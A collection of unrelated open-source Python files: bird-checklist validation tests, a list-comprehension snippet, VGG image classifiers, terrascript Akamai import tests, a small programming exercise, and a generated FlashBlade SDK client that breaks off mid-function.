        """Verify the time is set for the Incidental protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['time'], msg=source)

    def test_duration_hours_clear(self):
        """Verify duration in hours is not set for the Incidental protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['duration_hours'], msg=source)

    def test_duration_minutes_clear(self):
        """Verify duration in minutes is not set for the Incidental protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['duration_minutes'], msg=source)

    def test_distance_clear(self):
        """Verify the distance is not set for the Incidental protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['distance'], msg=source)

    def test_area_clear(self):
        """Verify the area is not set for the Incidental protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['area'], msg=source)


class WorldBirdsProtocolName(ValidationTestCase):
    """Validate the protocol names in the checklists from WorldBirds."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'worldbirds']

    def test_expected_names(self):
        """Verify the protocol name is expected.

        WorldBirds does not define a specific protocol. However, the start
        time and duration spent counting are defined, so a default protocol
        name of "Timed visit" is used.
        """
        for protocol, source in self.protocols:
            self.assertEqual(protocol['name'], 'Timed visit', msg=source)


class WorldBirdsTimedVisitProtocol(ValidationTestCase):
    """Validate the fields set in the Timed visit protocol from WorldBirds."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'worldbirds' and
                          checklist['protocol']['name'] == 'Timed visit']

    def test_time_set(self):
        """Verify the time is set for the Timed visit protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['time'], msg=source)

    def test_duration_set(self):
        """Verify the duration is set for the Timed visit protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['duration_hours'] or
                            protocol['duration_minutes'], msg=source)

    def test_distance_clear(self):
        """Verify the distance is not set for the Timed visit protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['distance'], msg=source)

    def test_area_clear(self):
        """Verify the area is not set for the Timed visit protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['area'], msg=source)
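
All of the validation cases above assume the same checklist record shape. As a hedged sketch, here is that assumed structure with the field names inferred from the assertions (the values are hypothetical; real records come from the downloaded checklists):

```python
import re

# Hypothetical checklist record mirroring the fields the tests read.
checklist = {
    'source': 'ebird',
    'protocol': {'name': 'Traveling', 'time': '07:30',
                 'duration_hours': 1, 'duration_minutes': 30,
                 'distance': 2, 'area': 0},
}

protocol = checklist['protocol']
# The same invariants the Traveling-protocol tests enforce:
assert re.match(r'\d\d:\d\d', protocol['time'])                     # time format
assert protocol['duration_hours'] or protocol['duration_minutes']   # duration set
assert protocol['distance'] and protocol['area'] == 0               # distance set, area clear
```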


# notebook/all_any_comprehension.py (vhn0912/python-snippets, MIT)

l = [0, 1, 2, 3, 4]
print([i > 2 for i in l])
# [False, False, False, True, True]
print(all([i > 2 for i in l]))
# False
print(any([i > 2 for i in l]))
# True
print(type([i > 2 for i in l]))
# <class 'list'>
print(type((i > 2 for i in l)))
# <class 'generator'>
print(type(i > 2 for i in l))
# <class 'generator'>
print(all(i > 2 for i in l))
# False
print(any(i > 2 for i in l))
# True
print(sum(i > 2 for i in l))
# 2
print(sum(not (i > 2) for i in l))
# 3
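
One property the snippet above does not show: `all()` and `any()` short-circuit, so when given a generator they stop consuming it as soon as the result is decided. A small sketch (the `seen` list is instrumentation added here, not part of the original snippet):

```python
l = [0, 1, 2, 3, 4]

def gt2(i, seen):
    seen.append(i)  # record which elements were actually evaluated
    return i > 2

seen_any = []
print(any(gt2(i, seen_any) for i in l), seen_any)
# True [0, 1, 2, 3]  -- any() stops at the first True (i == 3)

seen_all = []
print(all(gt2(i, seen_all) for i in l), seen_all)
# False [0]  -- all() stops at the first False (i == 0)
```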


# model/vgg_hgap.py (haifangong/SYSU-HCP-at-ImageCLEF-VQA-Med-2021, MIT)

import torch
import torch.nn as nn
import torchvision
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
from utils import LSoftmaxLinear
from utils import AngleLinear
from block.NonLocal import NonLocalBlock
from block.resizerNetwork import ResizerNetwork


class vgg16HGap(nn.Module):
    def __init__(self, pretrained=True, num_classes=330, rank=None, margin=None):
        super(vgg16HGap, self).__init__()
        self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:4])
        self.conv2 = nn.Sequential(*self.model_list[4:9])
        self.conv3 = nn.Sequential(*self.model_list[9:16])
        self.conv4 = nn.Sequential(*self.model_list[16:23])
        self.conv5 = nn.Sequential(*self.model_list[23:30])
        self.conv6 = nn.Sequential(self.model_list[30])
        self.pool1 = nn.AdaptiveAvgPool2d(1)
        self.pool2 = nn.AdaptiveAvgPool2d(1)
        self.pool3 = nn.AdaptiveAvgPool2d(1)
        self.pool4 = nn.AdaptiveAvgPool2d(1)
        self.pool5 = nn.AdaptiveAvgPool2d(1)
        self.pool6 = nn.AdaptiveAvgPool2d(1)
        self.classifier = nn.Linear(1984, num_classes)
        # self.lsoftmax_linear = LSoftmaxLinear(
        #     input_features=1984, output_features=num_classes, margin=margin, device=rank)
        # self.asoftmax = AngleLinear(1984, num_classes, m=margin)

    def forward(self, x, targeta=None, targetb=None):
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        p6 = self.pool6(y6)
        f = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3).squeeze(2)
        return self.classifier(f)
        # if self.training:
        #     outa = self.lsoftmax_linear(input=f, target=targeta)
        #     outb = self.lsoftmax_linear(input=f, target=targetb)
        #     return outa, outb
        # else:
        #     return self.lsoftmax_linear(input=f)
        # return self.asoftmax(f)


class vgg16HGap_bn(nn.Module):
    def __init__(self, pretrained=True, num_classes=330):
        super(vgg16HGap_bn, self).__init__()
        self.vgg = torchvision.models.vgg16_bn(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:6])
        self.conv2 = nn.Sequential(*self.model_list[6:13])
        self.conv3 = nn.Sequential(*self.model_list[13:23])
        self.conv4 = nn.Sequential(*self.model_list[23:33])
        self.conv5 = nn.Sequential(*self.model_list[33:43])
        self.conv6 = nn.Sequential(self.model_list[43])
        self.pool1 = nn.AvgPool2d(224)
        self.pool2 = nn.AvgPool2d(112)
        self.pool3 = nn.AvgPool2d(56)
        self.pool4 = nn.AvgPool2d(28)
        self.pool5 = nn.AvgPool2d(14)
        self.pool6 = nn.AvgPool2d(7)
        self.classifier = nn.Linear(1984, num_classes)

    def forward(self, x):
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        p6 = self.pool6(y6)
        out = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3)
        out = out.squeeze(2)
        out = self.classifier(out)
        return out


class vgg16_multi_scales(nn.Module):
    def __init__(self, pretrained=True, num_classes=330):
        super(vgg16_multi_scales, self).__init__()
        self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:4])
        self.conv2 = nn.Sequential(*self.model_list[4:9])
        self.conv3 = nn.Sequential(*self.model_list[9:16])
        self.conv4 = nn.Sequential(*self.model_list[16:23])
        self.conv5 = nn.Sequential(*self.model_list[23:30])
        self.conv6 = nn.Sequential(self.model_list[30])
        self.pool1 = nn.AdaptiveAvgPool2d(1)
        self.pool2 = nn.AdaptiveAvgPool2d(1)
        self.pool3 = nn.AdaptiveAvgPool2d(1)
        self.pool4 = nn.AdaptiveAvgPool2d(1)
        self.pool5 = nn.AdaptiveAvgPool2d(1)
        self.pool6 = nn.AdaptiveAvgPool2d(1)
        self.fc1 = nn.Linear(256, num_classes)
        self.fc2 = nn.Linear(512, num_classes)
        self.fc3 = nn.Linear(512, num_classes)
        self.fc4 = nn.Linear(512, num_classes)

    def forward(self, x):
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        p6 = self.pool6(y6)
        out1 = p3.squeeze(3).squeeze(2)
        out1 = self.fc1(out1)
        out2 = p4.squeeze(3).squeeze(2)
        out2 = self.fc2(out2)
        out3 = p5.squeeze(3).squeeze(2)
        out3 = self.fc3(out3)
        out4 = p6.squeeze(3).squeeze(2)
        out4 = self.fc4(out4)
        if self.training:
            return [out1, out2, out3, out4]
        else:
            return out4


class vgg16_add(nn.Module):
    def __init__(self, pretrained=True, num_classes=330):
        super(vgg16_add, self).__init__()
        self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:4])
        self.conv2 = nn.Sequential(*self.model_list[4:9])
        self.conv3 = nn.Sequential(*self.model_list[9:16])
        self.conv4 = nn.Sequential(*self.model_list[16:23])
        self.conv5 = nn.Sequential(*self.model_list[23:30])
        self.conv6 = nn.Sequential(self.model_list[30])
        self.pool1 = nn.AdaptiveAvgPool2d(1)
        self.pool2 = nn.AdaptiveAvgPool2d(1)
        self.pool3 = nn.AdaptiveAvgPool2d(1)
        self.pool4 = nn.AdaptiveAvgPool2d(1)
        self.pool5 = nn.AdaptiveAvgPool2d(1)
        self.pool6 = nn.AdaptiveAvgPool2d(1)
        self.fc1 = nn.Linear(256, num_classes)
        self.fc2 = nn.Linear(512, num_classes)
        self.fc3 = nn.Linear(512, num_classes)
        self.fc4 = nn.Linear(512, num_classes)

    def forward(self, x):
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        p6 = self.pool6(y6)
        out1 = p3.squeeze(3).squeeze(2)
        out1 = self.fc1(out1)
        out2 = p4.squeeze(3).squeeze(2)
        out2 = self.fc2(out2)
        out3 = p5.squeeze(3).squeeze(2)
        out3 = self.fc3(out3)
        out4 = p6.squeeze(3).squeeze(2)
        out4 = self.fc4(out4)
        return out1 + out2 + out3 + out4


class vgg19HGap(nn.Module):
    def __init__(self, pretrained=True, num_classes=330):
        super(vgg19HGap, self).__init__()
        self.vgg = torchvision.models.vgg19(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:4])
        self.conv2 = nn.Sequential(*self.model_list[4:9])
        self.conv3 = nn.Sequential(*self.model_list[9:18])
        self.conv4 = nn.Sequential(*self.model_list[18:27])
        self.conv5 = nn.Sequential(*self.model_list[27:36])
        self.conv6 = nn.Sequential(self.model_list[36])
        self.pool1 = nn.AvgPool2d(224)
        self.pool2 = nn.AvgPool2d(112)
        self.pool3 = nn.AvgPool2d(56)
        self.pool4 = nn.AvgPool2d(28)
        self.pool5 = nn.AvgPool2d(14)
        self.pool6 = nn.AvgPool2d(7)
        self.classifier = nn.Linear(1984, num_classes)

    def forward(self, x):
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        p6 = self.pool6(y6)
        out = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3)
        out = out.squeeze(2)
        out = self.classifier(out)
        return out


class vgg16NonLocal(nn.Module):
    def __init__(self, pretrained=True, num_classes=330, rank=None, margin=None):
        super(vgg16NonLocal, self).__init__()
        self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:4])
        self.conv2 = nn.Sequential(*self.model_list[4:9])
        self.conv3 = nn.Sequential(*self.model_list[9:16])
        self.conv4 = nn.Sequential(*self.model_list[16:23])
        self.conv5 = nn.Sequential(*self.model_list[23:30])
        self.conv6 = nn.Sequential(self.model_list[30])
        self.pool1 = nn.AvgPool2d(224)
        self.pool2 = nn.AvgPool2d(112)
        self.pool3 = nn.AvgPool2d(56)
        self.pool4 = nn.AvgPool2d(28)
        self.pool5 = nn.AvgPool2d(14)
        self.pool6 = nn.AvgPool2d(7)
        self.non4 = NonLocalBlock(512)
        self.non5 = NonLocalBlock(512)
        self.non6 = NonLocalBlock(512)
        self.classifier = nn.Linear(1984, num_classes)

    def forward(self, x, targeta=None, targetb=None):
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        y4 = self.non4(y4)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        y5 = self.non5(y5)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        y6 = self.non6(y6)
        p6 = self.pool6(y6)
        f = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3).squeeze(2)
        return self.classifier(f)


class vgg16HGap_resizer(nn.Module):
    def __init__(self, pretrained=True, num_classes=330, rank=None, margin=None, output_size=(224, 224), num_residuals=1):
        super(vgg16HGap_resizer, self).__init__()
        self.resizer = ResizerNetwork(output_size=output_size, num_residuals=num_residuals)
        self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
        self.model_list = list(self.vgg.children())
        self.conv1 = nn.Sequential(*self.model_list[0:4])
        self.conv2 = nn.Sequential(*self.model_list[4:9])
        self.conv3 = nn.Sequential(*self.model_list[9:16])
        self.conv4 = nn.Sequential(*self.model_list[16:23])
        self.conv5 = nn.Sequential(*self.model_list[23:30])
        self.conv6 = nn.Sequential(self.model_list[30])
        self.pool1 = nn.AvgPool2d(224)
        self.pool2 = nn.AvgPool2d(112)
        self.pool3 = nn.AvgPool2d(56)
        self.pool4 = nn.AvgPool2d(28)
        self.pool5 = nn.AvgPool2d(14)
        self.pool6 = nn.AvgPool2d(7)
        self.classifier = nn.Linear(1984, num_classes)

    def forward(self, x):
        x = self.resizer(x)
        y1 = self.conv1(x)
        p1 = self.pool1(y1)
        y2 = self.conv2(y1)
        p2 = self.pool2(y2)
        y3 = self.conv3(y2)
        p3 = self.pool3(y3)
        y4 = self.conv4(y3)
        p4 = self.pool4(y4)
        y5 = self.conv5(y4)
        p5 = self.pool5(y5)
        y6 = self.conv6(y5)
        p6 = self.pool6(y6)
        f = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3).squeeze(2)
        return self.classifier(f)


if __name__ == '__main__':
    model = vgg16HGap_resizer(pretrained=True)
    model(torch.rand(2, 3, 512, 512))
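
The 1984-dimensional input to every `classifier` above is the concatenation of the six pooled feature maps. A quick sanity check of that arithmetic (the channel counts are the standard torchvision VGG16 block widths, and the last stage is a max-pool that keeps 512 channels):

```python
# Per-stage output channels of VGG16 features, matching conv1..conv6 above.
channels = [64, 128, 256, 512, 512, 512]
hgap_dim = sum(channels)
assert hgap_dim == 1984  # matches nn.Linear(1984, num_classes)
print(hgap_dim)
# 1984
```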


# src/cmcandy/Python_language_Answers/dc-3.py (ch98road/leetcode, MIT)

# 123 345 -10123


# tests/test_provider_akamai_akamai.py (mjuenema/python-terrascript, BSD-2-Clause)
# Automatically generated by tools/makecode.py (24-Sep-2021 15:11:11 UTC)
def test_provider_import():
    import terrascript.provider.akamai.akamai


def test_resource_import():
    from terrascript.resource.akamai.akamai import akamai_appsec_activations
    from terrascript.resource.akamai.akamai import (
        akamai_appsec_advanced_settings_logging,
    )
    from terrascript.resource.akamai.akamai import (
        akamai_appsec_advanced_settings_pragma_header,
    )
    from terrascript.resource.akamai.akamai import (
        akamai_appsec_advanced_settings_prefetch,
    )
    from terrascript.resource.akamai.akamai import (
        akamai_appsec_api_constraints_protection,
    )
    from terrascript.resource.akamai.akamai import akamai_appsec_api_request_constraints
    from terrascript.resource.akamai.akamai import akamai_appsec_attack_group
    from terrascript.resource.akamai.akamai import akamai_appsec_bypass_network_lists
    from terrascript.resource.akamai.akamai import akamai_appsec_configuration
    from terrascript.resource.akamai.akamai import akamai_appsec_configuration_rename
    from terrascript.resource.akamai.akamai import akamai_appsec_custom_deny
    from terrascript.resource.akamai.akamai import akamai_appsec_custom_rule
    from terrascript.resource.akamai.akamai import akamai_appsec_custom_rule_action
    from terrascript.resource.akamai.akamai import akamai_appsec_eval
    from terrascript.resource.akamai.akamai import akamai_appsec_eval_group
    from terrascript.resource.akamai.akamai import akamai_appsec_eval_hostnames
    from terrascript.resource.akamai.akamai import akamai_appsec_eval_protect_host
    from terrascript.resource.akamai.akamai import akamai_appsec_eval_rule
    from terrascript.resource.akamai.akamai import akamai_appsec_ip_geo
    from terrascript.resource.akamai.akamai import akamai_appsec_ip_geo_protection
    from terrascript.resource.akamai.akamai import akamai_appsec_match_target
    from terrascript.resource.akamai.akamai import akamai_appsec_match_target_sequence
    from terrascript.resource.akamai.akamai import akamai_appsec_penalty_box
    from terrascript.resource.akamai.akamai import akamai_appsec_rate_policy
    from terrascript.resource.akamai.akamai import akamai_appsec_rate_policy_action
    from terrascript.resource.akamai.akamai import akamai_appsec_rate_protection
    from terrascript.resource.akamai.akamai import akamai_appsec_reputation_profile
    from terrascript.resource.akamai.akamai import (
        akamai_appsec_reputation_profile_action,
    )
    from terrascript.resource.akamai.akamai import (
        akamai_appsec_reputation_profile_analysis,
    )
    from terrascript.resource.akamai.akamai import akamai_appsec_reputation_protection
    from terrascript.resource.akamai.akamai import akamai_appsec_rule
    from terrascript.resource.akamai.akamai import akamai_appsec_rule_upgrade
    from terrascript.resource.akamai.akamai import akamai_appsec_security_policy
    from terrascript.resource.akamai.akamai import akamai_appsec_security_policy_rename
    from terrascript.resource.akamai.akamai import akamai_appsec_selected_hostnames
    from terrascript.resource.akamai.akamai import akamai_appsec_siem_settings
    from terrascript.resource.akamai.akamai import akamai_appsec_slow_post
    from terrascript.resource.akamai.akamai import akamai_appsec_slowpost_protection
    from terrascript.resource.akamai.akamai import akamai_appsec_threat_intel
    from terrascript.resource.akamai.akamai import akamai_appsec_version_notes
    from terrascript.resource.akamai.akamai import akamai_appsec_waf_mode
    from terrascript.resource.akamai.akamai import akamai_appsec_waf_protection
    from terrascript.resource.akamai.akamai import akamai_appsec_wap_selected_hostnames
    from terrascript.resource.akamai.akamai import akamai_cp_code
    from terrascript.resource.akamai.akamai import akamai_cps_dv_enrollment
    from terrascript.resource.akamai.akamai import akamai_cps_dv_validation
    from terrascript.resource.akamai.akamai import akamai_dns_record
    from terrascript.resource.akamai.akamai import akamai_dns_zone
    from terrascript.resource.akamai.akamai import akamai_edge_hostname
    from terrascript.resource.akamai.akamai import akamai_gtm_asmap
    from terrascript.resource.akamai.akamai import akamai_gtm_cidrmap
    from terrascript.resource.akamai.akamai import akamai_gtm_datacenter
    from terrascript.resource.akamai.akamai import akamai_gtm_domain
    from terrascript.resource.akamai.akamai import akamai_gtm_geomap
    from terrascript.resource.akamai.akamai import akamai_gtm_property
    from terrascript.resource.akamai.akamai import akamai_gtm_resource
    from terrascript.resource.akamai.akamai import akamai_iam_user
    from terrascript.resource.akamai.akamai import akamai_networklist_activations
    from terrascript.resource.akamai.akamai import akamai_networklist_description
    from terrascript.resource.akamai.akamai import akamai_networklist_network_list
    from terrascript.resource.akamai.akamai import akamai_networklist_subscription
    from terrascript.resource.akamai.akamai import akamai_property
    from terrascript.resource.akamai.akamai import akamai_property_activation
    from terrascript.resource.akamai.akamai import akamai_property_variables


def test_datasource_import():
    from terrascript.data.akamai.akamai import akamai_appsec_advanced_settings_logging
    from terrascript.data.akamai.akamai import (
        akamai_appsec_advanced_settings_pragma_header,
    )
    from terrascript.data.akamai.akamai import akamai_appsec_advanced_settings_prefetch
    from terrascript.data.akamai.akamai import akamai_appsec_api_endpoints
    from terrascript.data.akamai.akamai import akamai_appsec_api_request_constraints
    from terrascript.data.akamai.akamai import akamai_appsec_attack_groups
    from terrascript.data.akamai.akamai import akamai_appsec_bypass_network_lists
    from terrascript.data.akamai.akamai import akamai_appsec_configuration
    from terrascript.data.akamai.akamai import akamai_appsec_configuration_version
    from terrascript.data.akamai.akamai import akamai_appsec_contracts_groups
    from terrascript.data.akamai.akamai import akamai_appsec_custom_deny
    from terrascript.data.akamai.akamai import akamai_appsec_custom_rule_actions
    from terrascript.data.akamai.akamai import akamai_appsec_custom_rules
    from terrascript.data.akamai.akamai import akamai_appsec_eval
    from terrascript.data.akamai.akamai import akamai_appsec_eval_groups
    from terrascript.data.akamai.akamai import akamai_appsec_eval_hostnames
    from terrascript.data.akamai.akamai import akamai_appsec_eval_rules
    from terrascript.data.akamai.akamai import akamai_appsec_export_configuration
    from terrascript.data.akamai.akamai import akamai_appsec_failover_hostnames
    from terrascript.data.akamai.akamai import akamai_appsec_hostname_coverage
    from terrascript.data.akamai.akamai import (
        akamai_appsec_hostname_coverage_match_targets,
    )
    from terrascript.data.akamai.akamai import (
        akamai_appsec_hostname_coverage_overlapping,
    )
    from terrascript.data.akamai.akamai import akamai_appsec_ip_geo
    from terrascript.data.akamai.akamai import akamai_appsec_match_targets
    from terrascript.data.akamai.akamai import akamai_appsec_penalty_box
    from terrascript.data.akamai.akamai import akamai_appsec_rate_policies
    from terrascript.data.akamai.akamai import akamai_appsec_rate_policy_actions
    from terrascript.data.akamai.akamai import akamai_appsec_reputation_profile_actions
    from terrascript.data.akamai.akamai import akamai_appsec_reputation_profile_analysis
    from terrascript.data.akamai.akamai import akamai_appsec_reputation_profiles
    from terrascript.data.akamai.akamai import akamai_appsec_rule_upgrade_details
    from terrascript.data.akamai.akamai import akamai_appsec_rules
    from terrascript.data.akamai.akamai import akamai_appsec_security_policy
    from terrascript.data.akamai.akamai import akamai_appsec_security_policy_protections
    from terrascript.data.akamai.akamai import akamai_appsec_selectable_hostnames
    from terrascript.data.akamai.akamai import akamai_appsec_selected_hostnames
    from terrascript.data.akamai.akamai import akamai_appsec_siem_definitions
    from terrascript.data.akamai.akamai import akamai_appsec_siem_settings
    from terrascript.data.akamai.akamai import akamai_appsec_slow_post
    from terrascript.data.akamai.akamai import akamai_appsec_threat_intel
    from terrascript.data.akamai.akamai import akamai_appsec_version_notes
    from terrascript.data.akamai.akamai import akamai_appsec_waf_mode
    from terrascript.data.akamai.akamai import akamai_appsec_wap_selected_hostnames
    from terrascript.data.akamai.akamai import akamai_authorities_set
    from terrascript.data.akamai.akamai import akamai_contract
    from terrascript.data.akamai.akamai import akamai_contracts
    from terrascript.data.akamai.akamai import akamai_cp_code
    from terrascript.data.akamai.akamai import akamai_dns_record_set
    from terrascript.data.akamai.akamai import akamai_group
    from terrascript.data.akamai.akamai import akamai_groups
    from terrascript.data.akamai.akamai import akamai_gtm_default_datacenter
    from terrascript.data.akamai.akamai import akamai_iam_contact_types
    from terrascript.data.akamai.akamai import akamai_iam_countries
    from terrascript.data.akamai.akamai import akamai_iam_groups
    from terrascript.data.akamai.akamai import akamai_iam_roles
    from terrascript.data.akamai.akamai import akamai_iam_states
    from terrascript.data.akamai.akamai import akamai_iam_supported_langs
    from terrascript.data.akamai.akamai import akamai_iam_timeout_policies
    from terrascript.data.akamai.akamai import akamai_networklist_network_lists
    from terrascript.data.akamai.akamai import akamai_properties
    from terrascript.data.akamai.akamai import akamai_property
    from terrascript.data.akamai.akamai import akamai_property_hostnames
    from terrascript.data.akamai.akamai import akamai_property_products
    from terrascript.data.akamai.akamai import akamai_property_rule_formats
    from terrascript.data.akamai.akamai import akamai_property_rules
    from terrascript.data.akamai.akamai import akamai_property_rules_template
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.akamai.akamai
#
# t = terrascript.provider.akamai.akamai.akamai()
# s = str(t)
#
# assert 'https://github.com/akamai/terraform-provider-akamai' in s
# assert '1.7.0' in s
# File: URI_1019.py (repo: JVLJunior/Exercicios-URI, license: MIT)
t = int(input())
# URI 1019: print a duration given in seconds as hours:minutes:seconds.
# Note (t % 3600) % 60 is always equal to t % 60, so the simpler form is used.
print('{}:{}:{}'.format(t // 3600, (t % 3600) // 60, t % 60))
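The same conversion can be written with `divmod`, which yields quotient and remainder in one step. A sketch (`seconds_to_hms` is an illustrative name, not part of the original submission):

```python
def seconds_to_hms(t: int) -> str:
    """Convert a duration in seconds to an H:M:S string (URI 1019 format)."""
    hours, rest = divmod(t, 3600)        # full 3600-second blocks
    minutes, seconds = divmod(rest, 60)  # remaining minutes and seconds
    return "{}:{}:{}".format(hours, minutes, seconds)

print(seconds_to_hms(556))     # → 0:9:16
print(seconds_to_hms(140153))  # → 38:55:53
```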
# coding: utf-8
# File: purity_fb/purity_fb_1dot12/apis/object_store_access_policies_api.py
# Repo: tlewis-ps/purity_fb_python_client (license: Apache-2.0)
"""
Pure Storage FlashBlade REST 1.12 Python SDK
Pure Storage FlashBlade REST 1.12 Python SDK. Compatible with REST API versions 1.0 - 1.12. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.12
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ObjectStoreAccessPoliciesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_object_store_access_policies_object_store_users(self, **kwargs):
"""
Add a policy to an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_object_store_access_policies_object_store_users(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_object_store_access_policies_object_store_users_with_http_info(**kwargs)
else:
(data) = self.add_object_store_access_policies_object_store_users_with_http_info(**kwargs)
return data
def add_object_store_access_policies_object_store_users_with_http_info(self, **kwargs):
"""
Add a policy to an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_object_store_access_policies_object_store_users_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_object_store_access_policies_object_store_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies/object-store-users', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
